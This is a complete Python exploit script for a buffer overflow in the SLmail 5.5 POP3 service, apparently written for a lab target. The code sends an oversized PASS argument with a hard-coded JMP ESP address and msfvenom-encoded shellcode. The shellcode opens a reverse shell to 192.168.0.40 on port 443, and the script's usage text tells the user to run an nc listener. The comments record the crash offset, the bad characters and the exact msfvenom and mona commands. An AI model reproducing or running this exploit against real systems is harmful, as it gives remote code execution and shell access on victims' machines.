SLmail_exploit.py

#!/usr/bin/python

import socket
import sys
import re


# SLmail v5.5 Exploit
# author: Alaa H.J <MasterX>

# Tested on Windows 7 (x86)

PORT = 110


# after several testings, the SLmail crashed on 4654 bytes
# bad chars: \x00 \x0a \x0d
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.40 lport=443 -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -n 16 -f c

# found 426 bytes of space for the shell
shellcode = ("\x90\x41\xf8\x9f\x27\x99\x93\x91\x9b\x41\xfd\xfc\xf8\x9f\x93"
             "\x3f\xb8\x2a\x7b\x16\x22\xda\xdd\xd9\x74\x24\xf4\x5a\x29\xc9"
             "\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x68\x75\xf4\xd7\x90\x61"
             "\x7a\x17\x68\x72\x1b\x91\x8d\x43\x1b\xc5\xc6\xf4\xab\x8d\x8a"
             "\xf8\x40\xc3\x3e\x8a\x25\xcc\x31\x3b\x83\x2a\x7c\xbc\xb8\x0f"
             "\x1f\x3e\xc3\x43\xff\x7f\x0c\x96\xfe\xb8\x71\x5b\x52\x10\xfd"
             "\xce\x42\x15\x4b\xd3\xe9\x65\x5d\x53\x0e\x3d\x5c\x72\x81\x35"
             "\x07\x54\x20\x99\x33\xdd\x3a\xfe\x7e\x97\xb1\x34\xf4\x26\x13"
             "\x05\xf5\x85\x5a\xa9\x04\xd7\x9b\x0e\xf7\xa2\xd5\x6c\x8a\xb4"
             "\x22\x0e\x50\x30\xb0\xa8\x13\xe2\x1c\x48\xf7\x75\xd7\x46\xbc"
             "\xf2\xbf\x4a\x43\xd6\xb4\x77\xc8\xd9\x1a\xfe\x8a\xfd\xbe\x5a"
             "\x48\x9f\xe7\x06\x3f\xa0\xf7\xe8\xe0\x04\x7c\x04\xf4\x34\xdf"
             "\x41\x39\x75\xdf\x91\x55\x0e\xac\xa3\xfa\xa4\x3a\x88\x73\x63"
             "\xbd\xef\xa9\xd3\x51\x0e\x52\x24\x78\xd5\x06\x74\x12\xfc\x26"
             "\x1f\xe2\x01\xf3\xb0\xb2\xad\xac\x70\x62\x0e\x1d\x19\x68\x81"
             "\x42\x39\x93\x4b\xeb\xd0\x6e\x1c\xd4\x8d\x70\xf4\xbc\xcf\x70"
             "\x05\x86\x59\x96\x6f\xe8\x0f\x01\x18\x91\x15\xd9\xb9\x5e\x80"
             "\xa4\xfa\xd5\x27\x59\xb4\x1d\x4d\x49\x21\xee\x18\x33\xe4\xf1"
             "\xb6\x5b\x6a\x63\x5d\x9b\xe5\x98\xca\xcc\xa2\x6f\x03\x98\x5e"
             "\xc9\xbd\xbe\xa2\x8f\x86\x7a\x79\x6c\x08\x83\x0c\xc8\x2e\x93"
             "\xc8\xd1\x6a\xc7\x84\x87\x24\xb1\x62\x7e\x87\x6b\x3d\x2d\x41"
             "\xfb\xb8\x1d\x52\x7d\xc5\x4b\x24\x61\x74\x22\x71\x9e\xb9\xa2"
             "\x75\xe7\xa7\x52\x79\x32\x6c\x62\x30\x1e\xc5\xeb\x9d\xcb\x57"
             "\x76\x1e\x26\x9b\x8f\x9d\xc2\x64\x74\xbd\xa7\x61\x30\x79\x54"
             "\x18\x29\xec\x5a\x8f\x4a\x25")

# args, main
if len(sys.argv) != 2:
    print "-------------------------"
    print "-=- SLmail5.5 Exploit -=-"
    print "-------------------------"
    print "Usage: %s victimIP" % sys.argv[0]
    print "\nNote: you will get a shell on Kali's IP ('192.168.0.40'), Port: '443'."
    print "(so you should run 'nc' listener on background: 'nc -nvlp 443')\n"
    print "Exiting."
    sys.exit(0)

# validate victim-IP address
victimIP = sys.argv[1]
if not re.match("^([0-9]{1,3}\.){3}[0-9]{1,3}$", victimIP):
    print "Invalid victim-IP address.\n"
    print "Exiting."
    sys.exit(0)

# --------
# STARTING
# --------

# ESP 0x5f4a358f (FFE4)
# (SLMFC.DLL was not protected and not read-only)
# !mona find -s "\xFF\xE4" -m SLMFC.DLL
buffers = "A" * 4654 + "\x8f\x35\x4a\x5f" + shellcode
print 'Sending malicious code to SLmail5.5 ...'

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((victimIP, PORT))
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS ' + buffers + '\r\n')
    s.close()
    print "\nDone."
except KeyboardInterrupt:
    print "\nInterrupted."
    exit(0)
except socket.error:
    print "\nTerminated."